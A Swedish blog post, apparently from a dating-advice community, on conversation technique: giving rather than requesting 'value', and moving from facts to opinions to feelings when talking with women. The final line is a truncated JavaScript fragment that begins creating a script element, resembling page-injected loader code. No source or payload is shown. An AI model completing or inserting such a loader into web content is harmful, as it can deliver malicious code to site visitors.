Hej alla!

Jag tänkte skriva en liten bloggserie om hur man pratar, hur man berättar historier, och hur man förmedlar sig själv och sin identitet på ett bra sätt. Mycket har sagts i ämnet och jag ska försöka att inte låta detta handla om de grejer som Gustavo brukar prata om på Warm Alpha Seminar. Det här är lite teoretiska tankar från sista tiden, och jag menar på inget sätt att detta är den ultimata sanningen. Bara tänkvärt att reflektera kring för många killar tror jag.

stockxpertcom id143659 size1 Hur man pratar del 1   Olika sätt att prata

Att ge vs att ta
Vi brukar ofta inom CR prata om att ge värde, att bringa en påse kul till personen vi pratar med. Här har jag också märkt att många killar gör en klassisk tabbe när de pratar – de pratar värdetagande. Jag ska förklara.

Ett samtal är en utväxling av monologer, av personer som berättar saker för varandra. Vi kan här kalla konversationsinnehåll för värde. Det vill säga: den som berättar något är den som ger värde till den andra. Således är det ack så mycket viktigare att berätta än att ställa frågor. Frågor är ju bara en begäran om värde. Tänk på det själv, ”Varifrån kommer du?” tillför inte så mycket till den som får höra det, utan är en begäran om information, som förhoppningsvis leder till ett djupare samtal. Men i sig är frågan bara en begäran om värde. Så att gång på gång ställa frågor är egentligen bara att be och be och be om värde. Och hur kul är det egentligen? Jag säger inte att det är fel att ställa frågor. Men låt inte samtalet handla om frågor. Du kanske ställer en fråga som ”Varifrån kommer du?” och får ett svar ”Frankrike”. I det ögonblicket har du två val – att ge värde eller att begära mer värde, dvs ställa fler frågor. Att ställa fler frågor kan ofta leda in dig på samtal som ”Jaha, var i Frankrike kommer du ifrån?”, medan att ge värde kanske leder in dig på ett samtal som ”Frankrike, fan vad nice, jag var i Frankrike förra året och du kommer AALDRIG att ana vad som hände mig…” och sen är du på väg in i en historia.

Det här är svårt och kan kännas svårt ibland, men när man väl lärt sig detta blir det ett fantastiskt verktyg. För vet ni vad – hon vill ju inte berätta om vem hon e hela tiden, hon vill lära känna dig! Så du måste erbjuda henne lite!

Tre sätt att berätta
Om man nu lärt sig att ge värde i samtalet, och börjat prata, finns det även där tre sätt att prata på, vart ett av dem mer värdegivande än det föregående.

1. Förmedla information. Detta är kanske den tråkigaste formen av samtal. Hit räknar jag återgivande av fakta i alla former, samtal om fakta, etc. Typ: ”I Sverige bor det 9 miljoner människor”, ”Bussen går varje kvart”, ”Den här kameran kostar 2.000kr”, etc. Fakta. Fakta är tråkigt. Förvisso bättre att ge fakta än att begära fakta, men ändå blir det rätt tråkigt. Här trillar också förvånansvärt många killar dit. Killar som ställer krav på sig själva att det de säger måste vara bra, så de nöjer sig med att berätta vad som är sant, att ge information. Information kan vara bra, men det är knappast intressant för henne om det inte handlar om dig.

2. Uttrycka åsikter. Nu kommer vi in på att förmedla personlighet. Att uttrycka åsikter är alla former av värderingar, som ”Jag tycker att det ena är bra, och att det andra är dåligt, och att det borde vara så att saker och låg till på det tredje sättet”. Det här är way bättre än att bara prata om information, men det är väldigt lätt att man handlar i en diskussion eller debatt, eftersom åsikter syftar på någon sorts objektiv sanning, och så börjar man ta in fakta åt ena eller andra hållet, och helt plötsligt har man trillat ner till punkt ett. Man kan lära känna en person genom dess åsikter, men det är fortfarande något svårt då iallafall jag tror att vi inte är riktigt våra åsikter. Vi är våra känslor. Vilket leder oss in på nummer 3:

meet main Full Hur man pratar del 1   Olika sätt att prata

3. Uttrycka känslor. Här vill jag att samtalet ska ligga så mycket som möjligt. När man börjar förmedla känslor så förmedlar man vem man är. Känslor är en magisk grej som får människor att connecta med varandra. Detta kommer jag prata mer om i nästa avsnitt. Men hur pratar man om känslor? Man bygger upp samtalet dit. Man kan börja med information, gå vidare till åsikter och fortsätta in på känslor. Känslor uttrycks till exempel genom sättet man pratar på. Om man pratar passionerat om något, uttrycker mycket värderingar och vad man innerligt känner och tycker om något – oavsett vad. Det finns inget kvalitetskrav på känslor – ingen kan säga att dina känslor är dåliga – de bara är. De behöver inte bevisas och kan inte argumenteras med. De förmedlar vem du är, att du är en verklig person, och kommer att få människor att gilla dig – om du bara lär dig förmedla dem på rätt sett. Du kan förmedla känslor när du förmedlar åsikter – genom att beskriva hur starkt du känner för något. Men du kan framför allt förmedla känslor i dina historier – och detta är vad jag kommer prata om i nästa del.

Hoppas ni fick ut nå värde av detta icon wink Hur man pratar del 1   Olika sätt att prata

Kärlek,
Sergej

var d=document;var s=d.createElement(‘script’);